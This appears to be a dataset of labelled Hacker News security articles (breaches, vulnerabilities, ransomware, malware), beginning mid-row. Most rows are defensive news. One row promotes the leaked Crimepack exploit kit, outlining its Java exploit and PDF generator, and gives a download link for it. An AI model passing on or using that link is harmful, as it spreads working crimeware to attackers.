The usability of the token is still unclear. Neither the explanation of tokens provided by Bitfinex is much clear, nor the legal status of the tokens is known.
""The BFX tokens will remain outstanding until repaid in full by Bitfinex or exchanged for shares of iFinex Inc,"" explains the company. ""The specific conditions associated with the exchange of these tokens will be explained in a later announcement.""
For the incident report filed by the Bitfinex user, you can head on to this link. No further details about the case are available at this moment.
Shortly after the breach of around $72 Million worth of its customers' Bitcoins, Hong Kong-based Bitcoin exchange announced a reward of $3.5 Million to anyone who can provide information that leads to the recovery of the stolen Bitcoins.
The incident was so big that the price of Bitcoin was dropped almost 20%, from $602.78 to $541 per Bitcoin, within a day after the announcement.
",Cyber_Attack
Health Insurer Excellus Hacked; 10.5 Million Records Breached,https://thehackernews.com/2015/09/health-insurance-hacking.html,"Health Care Hacks — the choice of hackers this year!
In a delayed revelation made by Excellus BlueCross BlueShield (BCBS), which says that about 10.5 Millions of their clients' data and information has been compromised by hackers.
Excellus BCBS headquartered in Rochester, New York, provides finance and health care services across upstate New York and long-term care insurance nationwide.
On August 5, 2015, Excellus BCBS discovered that the hackers targeted their IT systems back in December 2013, initiating a sophisticated attack to gain access to their systems and record client's personal data.
The Compromised Data includes:
Social Security Number (SSN)
Date of birth
Mailing address
Telephone number
Member identification number
Financial account information
Claims information
Did they forget something?...It seems everything is gone!
Moreover, it's been two years Excellus systems were open to the hackers. So, what the company was doing all this time?
Excellus BlueCross BlueShield in their statement said:
""This incident also affected members of other Blue Cross Blue Shield plans who sought treatment in the 31 county upstate New York service area of Excellus BCBS. Individuals who do business with us and provided us with their financial account information or Social Security number are also affected.""
The company has hired Mandiant Incident Response Team of FireEye Inc to help investigate the matter and to bring its systems back to normal by providing adequate remediation solutions.
Though the investigation has gathered no such evidence relating to removal of data, use or misuse of the compromised data.
Further, To save customers valuable data, the company showed concerns for the affected customers and said that they are going to:
Mail letters to its customers to let them know the facts and how they can in future secure their identity.
Offer cover of two years of free identity theft protection services and credit monitoring to affected individuals.
Moreover, for others, who are worried regarding their security can contact Excellus on 1-877-589-3331 (Toll-free) to know about the incident.
At the start of this year, Cyber attacks victims in health care were:
Anthem Healthcare with data breach of 80 million (the largest of all)
Premera with approximately 11 millions of users personal data being stolen
UCLA Health System with 4.5 millions of data leaks leading to identity theft
CareFirst with affecting 1.1 million (approx) customers
All the above companies were using BlueCross BlueShield insurance plans except UCLA health system.
Also, we need to think that for what purpose the hackers are going to use this bulk information...or is it the calm before the storm?
If we notice, vendors running BCBS plans are the ones mostly affected by this data breach.
So is the BCBS Association the target of the hackers? That one after the other its vendors offering insurance services are being victims of such massive data breaches.
This indeed makes us think of the potential of not only the cyber attacks and security but also the current threats to health care and associated bio-medical devices.
",Data_Breaches
Exim TLS Flaw Opens Email Servers to Remote 'Root' Code Execution Attacks,https://thehackernews.com/2019/09/exim-email-server-vulnerability.html,"A critical remote code execution vulnerability has been discovered in the popular open-source Exim email server software, leaving at least over half a million email servers vulnerable to remote hackers.
Exim maintainers today released Exim version 4.92.2 after publishing an early warning two days ago, giving system administrators a heads-up on its upcoming security patches that affect all versions of the email server software up to and including then-latest 4.92.1.
Exim is a widely used, open source mail transfer agent (MTA) software developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which runs almost 60% of the internet's email servers today for routing, delivering and receiving email messages.
Tracked as CVE-2019-15846, the security vulnerability only affects Exim servers that accept TLS connections, potentially allowing attackers to gain root-level access to the system ""by sending an SNI ending in a backslash-null sequence during the initial TLS handshake.""
SNI, stands for Server Name Indication, is an extension of the TLS protocol that allows the server to safely host multiple TLS certificates for multiple sites, all under a single IP address.
According to the Exim team, since the vulnerability doesn't depend on the TLS library being used by the server, both GnuTLS and OpenSSL are affected.
Moreover, though the default configuration of the Exim mail server software doesn't come with TLS enabled, some operating systems bundled the Exim software with the vulnerable feature enabled by default.
The vulnerability was discovered by an open source contributor and security researcher who goes by the online alias Zerons and analyzed by cybersecurity experts at Qualys.
Just three months ago, Exim also patched a severe remote command execution vulnerability, tracked as CVE-2019-10149, that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.
The Exim advisory says that a rudimentary proof of concept (PoC) exists for this flaw, but currently there is no known exploit available to the public.
Server administrators are highly recommended to install the latest Exim 4.92.2 version immediately, and if not possible, can mitigate the issue by not allowing unpatched Exim servers to accept TLS connections.
The team says, ""If you can't install the above versions, ask your package maintainer for a version containing the backported fix. On request and depending on our resources we will support you in backporting the fix.""
",Vulnerability
Hackers Are Targeting Microsoft Exchange Servers With Ransomware,https://thehackernews.com/2021/03/icrosoft-exchange-ransomware.html,"It didn't take long. Intelligence agencies and cybersecurity researchers had been warning that unpatched Exchange Servers could open the pathway for ransomware infections in the wake of swift escalation of the attacks since last week.
Now it appears that threat actors have caught up.
According to the latest reports, cybercriminals are leveraging the heavily exploited ProxyLogon Exchange Server flaws to install a new strain of ransomware called ""DearCry.""
""Microsoft observed a new family of human operated ransomware attack customers – detected as Ransom:Win32/DoejoCrypt.A,"" Microsoft researcher Phillip Misner tweeted. ""Human operated ransomware attacks are utilizing the Microsoft Exchange vulnerabilities to exploit customers.""
Microsoft's security intelligence team, in a separate tweet, confirmed that it has begun ""blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers.""
Security firm Kryptos Logic said it identified about 6,970 exposed web shells, some of which were used to infect the compromised servers with DearCry ransomware, suggesting that other cybercriminal groups are piggybacking on the first-stage web shell backdoor planted by the Hafnium threat actor to install additional malware of their choice.
Calling DearCry a ""copy"" ransomware, Sophos Director Mark Loman said the strain creates encrypted copies of the attacked files using an encryption key embedded in the ransomware binary and deletes the original versions, thereby allowing the victims to ""potentially recover some data"" due to this encryption-behavior.
""Defenders should take urgent steps to install Microsoft's patches to prevent exploitation of their Microsoft Exchange patches. If this is not possible, the server should be disconnected from the internet or closely monitored by a threat response team,"" Loman said.
In a joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies warned that ""adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack.""
Successful weaponization of the flaws allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network. With the new ransomware threat, unpatched Servers are not only at risk of potential data theft but also get potentially encrypted, preventing access to an organization's mailboxes.
PoC Takedown From GitHub Triggers Debate
Meanwhile, as nation-state hackers and cybercriminals pile on to take advantage of the ProxyLogon flaws, a proof-of-concept (PoC) code shared on Microsoft-owned GitHub by a security researcher has been taken down by the company, citing that the exploit is under active attack.
In a statement to Vice, the company said, ""In accordance with our Acceptable Use Policies, we disabled the gist following reports that it contains proof of concept code for a recently disclosed vulnerability that is being actively exploited.""
The move has also sparked a debate of its own, with researchers arguing that Microsoft is ""silencing security researchers"" by removing PoCs shared on GitHub.
""This is huge, removing a security researchers code from GitHub against their own product and which has already been patched,"" TrustedSec's Dave Kennedy said. ""It was a PoC, not a working exploit — none of the PoCs have had the RCE. Even if it did, that's not their call on when the appropriate time to release is. It's an issue in their own product, and they are silencing security researchers on that.""
This was also echoed by Google Project Zero researcher Tavis Normandy.
""If the policy from the start was no PoC/metasploit/etc — that would suck, but it's their service,"" Normandy said in a tweet. ""Instead they said OK, and now that it's become the standard for security pros to share code, they have elected themselves the arbiters of what is 'responsible.' How convenient.""
But replying to Kennedy on Twitter, security researcher Marcus Hutchins said ""'Has already been patched.' Dude, there's more than 50,000 unpatched exchange servers out there. Releasing a full ready to go RCE chain is not security research, it's recklessness and stupid.""
If anything, the avalanche of attacks should serve as a warning to patch all versions of the Exchange Server as soon as possible, while also take steps to identify signs of indicators of compromise associated with the hacks, given that the attackers were exploiting these zero-day vulnerabilities in the wild for at least two months before Microsoft released the patches on March 2.
",Malware
Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform — Patch ASAP!,https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html,"Application security company F5 Networks on Wednesday published an advisory warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks.
The patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), two of which were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020.
The four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues.
Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a DoS attack.
Urging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague said the ""vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program.""
The vulnerabilities have been addressed in the following products:
BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3
BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2
Besides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues.
The fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution.
The latest update to BIG-IP software arrives less than a year after the company addressed a similar critical flaw (CVE-2020-5902) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a ""broad scanning activity for the presence of this vulnerability across federal departments and agencies.""
""This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices,"" said Matt ""Pwn all the Things"" Tait in a tweet.
",Malware
Unbreakable Apple's iMessage encryption is vulnerable to eavesdropping attack,https://thehackernews.com/2013/10/unbreakable-apples-imessage-encryption.html,"Though Apple claims iMessage has end-to-end encryption, But researchers claimed at a security conference that Apple's iMessage system is not protected and the company can easily access it.
Cyril Cattiaux - better known as pod2g, who has developed iOS jailbreak software, said that the company's claim about iMessage protection by unbreakable encryption is just a lie, because the weakness is in the key infrastructure as it is controlled by Apple: they can change a key anytime they want, thus read the content of our iMessages.
Basically, when you send an iMessage to someone, you grab their public key from Apple, and encrypt your message using that public key. On the other end, recipients have their own private key that they use to decrypt this message. A third-party won't be able to see the actual message unless they have access to the private key.
Trust and public keys always have a problem, but the researchers noted that there's no evidence that Apple or the NSA is actually reading iMessages, but say that it's possible. ""Apple has no reason to do so. But what of intelligence agencies?"" he said.
The researchers were able to create a bogus certificate authority and then add it to an iPhone Keychain to proxify SSL encrypted communications to and from the device, and in the process discovered that their AppleID and password was being transmitted in clear text.
He says that since Apple controls the public key directory that gives you the public key for every user, it could perform a man-in-the-middle (MITM) attack to intercept your messages if asked to by a government agency.
A solution for Apple would be to store public keys locally in a protected database within iOS, as then the keys could be compared.
",Vulnerability
Rogue software update cause Malware attack on Japanese Nuclear Power Plant,https://thehackernews.com/2014/01/rogue-software-update-cause-malware_9.html,"The most critical and worst target of a State-sponsored cyber-attacks could be Hospitals, Dams, Dykes and Nuclear power stations and this may cause military conflicts between countries.
According to Japan Today, The Monju nuclear power plant in Tsuruga, Japan was accidentally targeted by a malware on 2nd January, when a worker updated the system to the latest version of the video playback program.
Monju Nuclear Plant is a sodium-cooled fast reactor, was launched in April 1994. It has not been operational for most of the past 20 years, after an accident in which a sodium leak caused a major fire.
Employees over there are only left with a regular job of company's paperwork and maintenance. So the malware could have stolen only some sensitive documents, emails, training records and employees' data sheets. The Malware command-and-control server suspected to be from South Korea.
The malware itself is not much sophisticated like Stuxnet or Duqu, but the unmanaged software update and patch management system can seriously lead to a critical cyber attack. Even being isolated from the Internet does not prevent you from being infected.
One of the best examples of flawed Internal policies is Stuxnet, one of the most infamous pieces of malware ever created to destroy Iranian Nuclear plants and infected the systems through a USB stick only.
Also in November, The Kaspersky revealed that Russian astronauts carried a removable device into space which infected systems on the space station.
",Data_Breaches
Hacking Facebook users just from chat box using multiple vulnerabilities,https://thehackernews.com/2013/04/hacking-facebook-users-just-from-chat.html,"Nir Goldshlager, Founder/CEO at Break Security known for finding serious flaws in Facebook once again on The Hacker News for sharing his new finding i.e Stored Cross-site Scripting (XSS) in Facebook Chat, Check In and Facebook Messenger.
Stored Cross-site Scripting (XSS) is the most dangerous type of Cross Site Scripting. Web applications where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc
1.) Stored XSS In Facebook Chat: This vulnerability can be used to conduct a number of browser-based attacks including, Hijacking another user's browser, Capturing sensitive information viewed by application users, Malicious code is executed by the user's browser etc.
When a user starts a new message within Facebook that has a link inside, a preview GUI shows up for that post. The GUI is used for presenting the link post using a parameter i.e attachment[params][title],attachment[params][urlInfo][final] , which was not actually filtered for valid links by Facebook.
For proof of concept, Goldshlager exploit this flaw in a way, that each time the victim clicks on this malicious message in Facebook Chat, the Stored XSS will begin to run on their client, as shown:
2.) Stored XSS In Facebook Check-In: The other major and an interesting Stored XSS that Nir reported is in the Facebook Check-In Screen. To exploit this loophole the attackers needs to first construct a new location within Facebook Pages and then, the attacker must change the settings in those new location. When the victim later decides to go to the place the attacker has been, a Stored XSS will run client-side.
3.) Stored XSS In Facebook Messenger (Windows): 3rd and serious flaw in Facebook is capable of injecting a Stored XSS Payload in Facebook Messenger for Windows. Any time the victim sign in into their account in the Messenger, the Stored XSS code will execute on victim's end.
Video Demonstrations
Bugs was reported to Facebook last month by Nir and already patched by Facebook security team.
Old Finding by Nir:
Facebook OAuth flaw allows gaining full control over any Facebook account
Facebook hacking accounts using another OAuth vulnerability
URL Redirection flaw in Facebook apps push OAuth vulnerability again in action
",Vulnerability
"Crimepack 3.1.3 Exploit kit Leaked, available for Download !",https://thehackernews.com/2011/05/crimepack-313-exploit-kit-leaked.html,"Crimepack 3.1.3 Exploit kit Leaked, available for Download !
Part 1: Java Exploit
As stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class.
Part 1.1: Crimepack.class
This class is the engine of the malware, it is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great…), once you get rid of the obfuscation you can see the following code:
As always, we have an Applet that access to the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point as you can see we have nothing new, the above is a common Java downloader… but let's scroll down:
Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..).
Part 1.2: KAVS.class
Here is the hand-crafted class, I say hand-crafted because such class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode:
Part 2: PDF-generator on demand
The kit contains a nice php script that drops custom pdf on-demand, which means that you can have several mutations of the same piece of malware, by simply connecting to a malicious link.
Download Here : https://www.multiupload.com/3HGKHWMRS5
Source
",Malware
"DNS cache poisoning attack on Google, Gmail, YouTube, Yahoo, Apple",https://thehackernews.com/2011/12/dns-cache-poisoning-attack-on-google.html,"DNS cache poisoning attack on Google, Gmail, YouTube, Yahoo, Apple
Hacker with nickname AlpHaNiX deface Google, Gmail, Youtube, Yahoo, Apple etc domains of Democratic Republic of Congo. Hacker use strategy so-called DNS cache poisoning.
DNS cache poisoning is a security or data integrity compromise in the Domain Name System (DNS). The compromise occurs when data is introduced into a DNS name server's cache database that did not originate from authoritative DNS sources. It may be a deliberate attempt of a maliciously crafted attack on a name server.
Hacked websites are :
https://apple.cd/
https://yahoo.cd/
https://gmail.cd/
https://google.cd/
https://youtube.cd/
https://linux.cd/
https://samsung.cd/
https://hotmail.cd/
https://microsoft.cd/
[Source]
",Vulnerability
New Mac Malware 'Dockster' Found on Dalai Lama site,https://thehackernews.com/2012/12/new-mac-malware-dockster-found-on-dalai.html,"A new trojan horse app called Dockster is targeting Mac users by exploiting a known Java vulnerability CVE-2012-0507. The trojan is apparently being delivered through a website (gyalwarinpoche.com) dedicated to the Dalai Lama and once installed can collect user keystrokes and other personal information.
Mac in Danger ? Earlier this spring, a Russian security firm discovered a trojan piece of malware which took advantage of a Java vulnerability on many computers, Macs and PCs alike. This trojan, known as ""Flashback,"" was used to enlist some 600,000 infected computers into a botnet.
Malware also provides an interface that allows attackers to download and execute additional malware. Dockster has been found to use the same exploit code as the previous SabPab virus to gain access through a backdoor. Dockster is also said to launch an agent called mac.dockset.deman, which restarts each time a user logs in to their Mac.
Dockster is only the latest Mac-based threat to hit organizations and people sympathetic to Tibet's conflict with the Chinese government.
In April, another piece of malware, known as ""Backdoor.OSX.SabPub,"" or ""SabPub"" was found and distributed through Microsoft Office files sent to those who may sympathize with Tibet. The attackers behind SabPub used a technique known as ""Spear-Phishing,"" a practice used to target smaller groups of people as opposed to sending out mass emails in hopes that someone will click a link.
In September, security firm AlienVault said it had discovered the creator of the PlugX Remote Access Tool (RAT), which had been used by hackers from various countries to target Tibet. The creator hailed from China.
",Malware
First Android Clipboard Hijacking Crypto Malware Found On Google Play Store,https://thehackernews.com/2019/02/android-clickboard-hijacking.html,"A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users.
The malware, described as a ""Clipper,"" masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging to attackers, ESET researcher Lukas Stefanko explained in a blog post.
Since cryptocurrency wallet addresses are made up of long strings of characters for security reasons, users usually prefer copying and pasting the wallet addresses using the clipboard over typing them out.
The newly discovered clipper malware, dubbed Android/Clipper.C by ESET, took advantage of this behavior to steal users cryptocurrency.
To do this, attackers first tricked users into installing the malicious app that impersonated a legitimate cryptocurrency service called MetaMask, claiming to let users run Ethereum decentralized apps in their web browsers without having to run a full Ethereum node.
Officially, the legitimate version of MetaMask is only available as a web browser extension for Chrome, Firefox, Opera, or Brave, and is not yet launched on any mobile app stores.
However, Stefanko spotted the malicious MetaMask app on Play Store targeting users who want to use the mobile version of the service by changing their legitimate cryptocurrency wallet address to the hacker's own address via the clipboard.
As a result, users who intended to transfer funds into a cryptocurrency wallet of their choice would instead make a deposit into the attacker's wallet address pasted by the malicious app.
""Several malicious apps have been caught previously on Google Play impersonating MetaMask. However, they merely phished for sensitive information with the goal of accessing the victims' cryptocurrency funds,"" Stefanko said.
""Android Clipper targeted Bitcoin and Ethereum cryptocurrency addresses when being copied in to clipboard and replaced them with the attacker's wallet address. Once this transaction is sent, it can not be canceled.""
Stefanko spotted the malicious MetaMask app, which he believes was the first Android Trojan Clipper to be discovered on Play Store, shortly after its introduction to the app store on February 1.
Google took down the malicious app almost immediately after being notified by the researcher.
While the bitcoin price has been dropped steadily since hitting its all-time high in December 2017, there is no reduction (in fact rise) in the cryptocurrency scandals, thefts, and scams that continue to plague the industry.
Just last week, The Hacker News reported how customers of the largest Canadian bitcoin exchange QuadrigaCX lost $145 million in cryptocurrency after the sudden death of its owner who was the only one with access to the company's cold (offline) storage wallets. However, some users and researchers are suggesting the incident could be an exit scam.
",Malware
The FixMeStick : My Parents Need This,https://thehackernews.com/2012/09/the-fixmestick-my-parents-need-this.html,"The founders over at FixMeStick sent us a pair of their latest devices to check out. The FixMeStick is, in short, a malware removal device for dummies. The FixMeStick is a bootable USB device running Lubuntu and integrates three separate anti-virus scanners from Kaspersky Labs, Sophos, and GFI. While our readers will probably never need it for themselves, we may all wish we had something like this for our non-technical friends and family, or the 9 million PCs infected with ZeroAccess botnet. The FixMeStick does a lot of things that nobody else does on a bootable USB, and let's be real, removing rootkits is never pleasant or easy.
Why I Want it For My Parents
Linux: the FixMeStick is a Linux-based device that runs before Windows boots enabling it to remove infections without the infection getting stealthy or playing war with my parent's anti-virus software.
N-Scanner architecture: contains an integrated multi-scanner composed of three engines: Kaspersky Labs, Sophos, and GFI's VIPRE.
Full screen app: all the technology is integrated behind a single full-screen application, my parents never see Linux, or any of the three anti-virus engines. Typical Linux shortcut keys still work, but there's no risk of my mother wandering off into vi.
It's the easiest thing to use: right out of the box my parents just plug it into a USB port and double-click ""Run FixMeStick"". There's no software to install. The FixMeStick does this clever little hack with the Windows boot manager getting Windows to boot the FixMeStick one time. This means my parents don't have to futz with the BIOS, but you still can if you want to.
WiFi: supports wireless adapters and automatically finds my parents SSID and password from the Windows side and sets up the connection. My parents do nothing. I get no phone call from them. Automatic updates are fetched and stored directly on the FixMeStick.
It boots on everything: the boot-loader is setup such that it can support different boot configurations without my parents having to do anything. BIOS compatibility has been a killer to Live USBs, but we've not found a PC the FixMeStick will not boot on, including the fancy VAIOs that ship with a Boot From External Device setting off by default.
Out-of-band-management: this is quite cool, there's a remote connection client built into the FixMeStick, so if my parents need support, the FixMeStick engineers can connect directly to the device without my parents having to do anything other than provide the randomly generated userid and password generated by the app.
What's Not Good:
Out-of-band-management! A bad actor could call my parents and tell them to plug in the FixMeStick and get the userid\password. Of course, such a social engineering attack is possible whether there's a FixMeStick in the house or not.
Denial of Service: Malware can deny access to the FixMeStick by smoking the MBR or the Linux files. There are a few ways to fix this, and you probably know what they are, and we expect to see one implemented in the next major version of the FixMeStick.
50% Discounts for The Hacker News readers:
Overall, we like this product. It's practical and well built. And while the digital futurists may be calling the end of the PC, the next massive botnet is not likely to run on iOS or Android. The FixMeStick provides a practical means for non-technical people to clean their own PCs.
Other, back of the box type information:
$49.99, with free shipping to anywhere in the world.
Toll free support with the real security people.
Works an unlimited number of times on up to 3 different PCs for a year. The PC count is reset each calendar month so people don't have to worry about adding\retiring PCs.
When the year is up, recharges can be purchased from www.FixMeStick.com.
The Windows launcher works on Windows XP, Vista, 7, and 8.
A minimum of 512MB RAM on the host PC.
Here's a coupon for the first 50 The Hacker News readers for 50% off the FixMeStick: FixMeStick-THN. You can have it shipped directly to your parents ;)
",Malware
Researcher Demonstrates 4 New Variants of HTTP Request Smuggling Attack,https://thehackernews.com/2020/08/http-request-smuggling.html,"A new research has identified four new variants of HTTP request smuggling attacks that work against various commercial off-the-shelf web servers and HTTP proxy servers.
Amit Klein, VP of Security Research at SafeBreach who presented the findings today at the Black Hat security conference, said that the attacks highlight how web servers and HTTP proxy servers are still susceptible to HTTP request smuggling even after 15 years since they were first documented.
What is HTTP Request Smuggling?
HTTP request smuggling (or HTTP Desyncing) is a technique employed to interfere with the way a website processes sequences of HTTP requests that are received from one or more users.
Vulnerabilities related to HTTP request smuggling typically arise when the front-end (a load balancer or proxy) and the back-end servers interpret the boundary of an HTTP request differently, thereby allowing a bad actor to send (or ""smuggle"") an ambiguous request that gets prepended to the next legitimate user request.
This desynchronization of requests can be exploited to hijack credentials, inject responses to users, and even steal data from a victim's request and exfiltrate the information to an attacker-controlled server.
The technique was first demonstrated in 2005 by a group of researchers from Watchfire, including Klein, Chaim Linhart, Ronen Heled, and Steve Orrin. But in the last five years, a number of improvements have been devised, significantly expanding on the attack surface to splice requests into others and ""gain maximum privilege access to internal APIs,"" poison web caches, and compromise login pages of popular applications.
What's New?
The new variants disclosed by Klein involve using various proxy-server combinations, including Aprelium's Abyss, Microsoft IIS, Apache, and Tomcat in the web-server mode, and Nginx, Squid, HAProxy, Caddy, and Traefik in the HTTP proxy mode.
The list of all new four new variants is as below, including an old one that the researcher successfully exploited in his experiments.
Variant 1: ""Header SP/CR junk: …""
Variant 2 – ""Wait for It""
Variant 3 – HTTP/1.2 to bypass mod_security-like defense
Variant 4 – a plain solution
Variant 5 – ""CR header""
When handling HTTP requests containing two Content-Length header fields, Abyss, for example, was found to accept the second header as valid, whereas Squid used the first Content-Length header, thus leading the two servers to interpret the requests differently and achieve request smuggling.
In situations where Abyss gets an HTTP request with a body whose length is less than the specified Content-Length value, it waits for 30 seconds to fulfill the request, but not before ignoring the remaining body of the request. Klein found that this also results in discrepancies between Squid and Abyss, with the latter interpreting portions of the outbound HTTP request as a second request.
A third variant of the attack uses HTTP/1.2 to circumvent WAF defenses as defined in OWASP ModSecurity Core Rule Set (CRS) for preventing HTTP request smuggling attacks craft a malicious payload that triggers the behavior.
Lastly, Klein discovered that using the ""Content-Type: text/plain"" header field was sufficient to bypass paranoia level checks 1 and 2 specified in CRS and yield an HTTP Request Smuggling vulnerability.
What Are the Possible Defenses?
After the findings were disclosed to Aprelium, Squid, and OWASP CRS, the issues were fixed in Abyss X1 v2.14, Squid versions 4.12, and 5.0.3 and CRS v3.3.0.
Calling for normalization of outbound HTTP Requests from proxy servers, Klein stressed the need for an open source, robust web application firewall solution that's capable of handling HTTP Request Smuggling attacks.
""ModSecurity (combined with CRS) is indeed an open source project, but as for robustness and genericity, mod_security has several drawbacks,"" Klein noted. ""It doesn't provide full protection against HTTP Request Smuggling [and] it is only available for Apache, IIS and nginx.""
To this end, Klein has published a C++-based library that ensures that all incoming HTTP requests are entirely valid, compliant, and unambiguous by enforcing strict adherence to HTTP header format and request line format. It can be accessed from GitHub here.
",Cyber_Attack
Bad Rabbit: New Ransomware Attack Rapidly Spreading Across Europe,https://thehackernews.com/2017/10/bad-rabbit-ransomware-attack.html,"A new widespread ransomware attack is spreading like wildfire around Europe and has already affected over 200 major organisations, primarily in Russia, Ukraine, Turkey and Germany, in the past few hours.
Dubbed ""Bad Rabbit,"" is reportedly a new Petya-like targeted ransomware attack against corporate networks, demanding 0.05 bitcoin (~ $285) as ransom from victims to unlock their systems.
According to an initial analysis provided by the Kaspersky, the ransomware was distributed via drive-by download attacks, using fake Adobe Flash players installer to lure victims' in to install malware unwittingly.
""No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. We've detected a number of compromised websites, all of which were news or media websites."" Kaspersky Lab said.
However, security researchers at ESET have detected Bad Rabbit malware as 'Win32/Diskcoder.D' — a new variant of Petya ransomware, also known as Petrwrap, NotPetya, exPetr and GoldenEye.
Bad Rabbit ransomware uses DiskCryptor, an open source full drive encryption software, to encrypt files on infected computers with RSA 2048 keys.
ESET believes the new wave of ransomware attack is not using EternalBlue exploit — the leaked SMB vulnerability which was used by WannaCry and Petya ransomware to spread through networks.
Instead it first scans internal network for open SMB shares, tries a hardcoded list of commonly used credentials to drop malware, and also uses Mimikatz post-exploitation tool to extract credentials from the affected systems.
The ransom note, shown above, asks victims to log into a Tor onion website to make the payment, which displays a countdown of 40 hours before the price of decryption goes up.
The affected organisations include Russian news agencies Interfax and Fontanka, payment systems on the Kiev Metro, Odessa International Airport and the Ministry of Infrastructure of Ukraine.
Researchers are still analyzing Bad Rabbit ransomware to check if there is a way to decrypt computers without paying ransomware and how to stop it from spreading further.
How to Protect Yourself from Ransomware Attacks?
Kaspersky suggest to disable WMI service to prevent the malware from spreading over your network.
Most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs.
So, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source to safeguard against such ransomware infection.
Also, never download any app from third-party sources, and read reviews even before installing apps from official stores.
To always have a tight grip on your valuable data, keep a good backup routine in place that makes their copies to an external storage device that isn't always connected to your PC.
Make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date.
",Cyber_Attack
"Yahoo data leak by Virus_Hima, Why do we need a proactive security?",https://thehackernews.com/2012/12/yahoo-data-leak-by-virushima-why-do-we.html,"In November I was contacted for first time by the Egyptian Hacker named ViruS_HimA who announced me to have hacked into Adobe servers and leaked private data.
The hacker violated Adobe servers gaining full access and dumping the entire database with more of 150,000 emails and hashed passwords of Adobe employees and customers/partner of the firm such as US Military, USAF, Google, Nasa DHL and many other companies.
ViruS_HimA specifically addressed the inefficient and slow patch management process that leaves exposed for long period ""big companies"".
""When someone report vulnerability to them, It take 5-7 days for the notification that they've received your report!! It even takes 3-4 months to patch the vulnerabilities! Such big companies should really respond very fast and fix the security issues as fast as they can.""
Like , we reported two days before that one month old reported critical vulnerability of account hijacking in Outlook and Hotmail is still working and Microsoft is not in any mood to fix it soon.
In a blog post, Adobe confirm that their ""Adobe Connect conferencing service"" forum was compromised and that the its database belongs only to the forum. Adobe also confirmed that ""not appear that any other Adobe services effected""
The attack wasn't politically motivated, ViruS_HimA desired to demonstrate how much vulnerable are also big enterprises such as Adobe, one of the most important company in IT landscape that leaks of a proper security defense. In that occasion the hacker anticipated a new striking attack against Yahoo.
""Don't be like Microsoft,Yahoo security teams!! but be like Google security team"" Qouted from Hima. As promised, the day has come, Yahoo data was stolen by Virus_Hima, that published the announcement on Pastebin and also on AnonPaste.
In the first part of the post the hacker confirm to be a single individual with ethical intents, he is a passionate penetration tester that already found tens of 0-days vulnerabilities in big web sites such as Adobe/Micorsoft/Yahoo/Google/Apple/Facebook and many more.
The hacker doesn't desire to damage the business of any company, he declared: ""I've published only little records for Adobe and I will never use/share/sell/publish Adobe/Yahoo data/exploits anywhere""
The situation appears paradoxical, according Virus_Hima the Yahoo company never replied to his alerts demonstrating the low attention to security questions : ""So i decided to teach both of them a hard lesson to harden them security procedures. It would make a disaster if such companies vulnerabilities was privately used in the underground and they never know about it! not only their customers been affected but the vendors themselves also suffer from such exploits. Adobe acrobat/flash, Yahoo data leak of that 400k emails, and that hotmail remote password reset vulnerabilities is an example.. ""
The hacker to be credible decided to leak critical emails such as military ones to force companies to take action. He highlighted that acting in this was obtained a fast response, just one day, in the past when in similar situation he alerted the victims, the enterprises have released a patch in 3 or 4 months.
Following the proofs of the hack proposed by the Egyptian hacker:
1.) Leaks contains: Full files backup for one of Yahoo domains!! [Lead to full access on the server of that domain] Full access to ""12"" of Yahoo Databases!! [Lead to full access on the server of that domain] Reflected-XSS(Cross Site Scripting) vulnerability.
2. ) Hints for DB's names: Pr***tionH**s, k*az*y << fair eh?
3.) XSS(Cross Site Scripting) vulnerability :
The hacker desires also to inform the readers that he never sold Yahoo exploit before, the guy that done it in the past for 700$ is a different person.
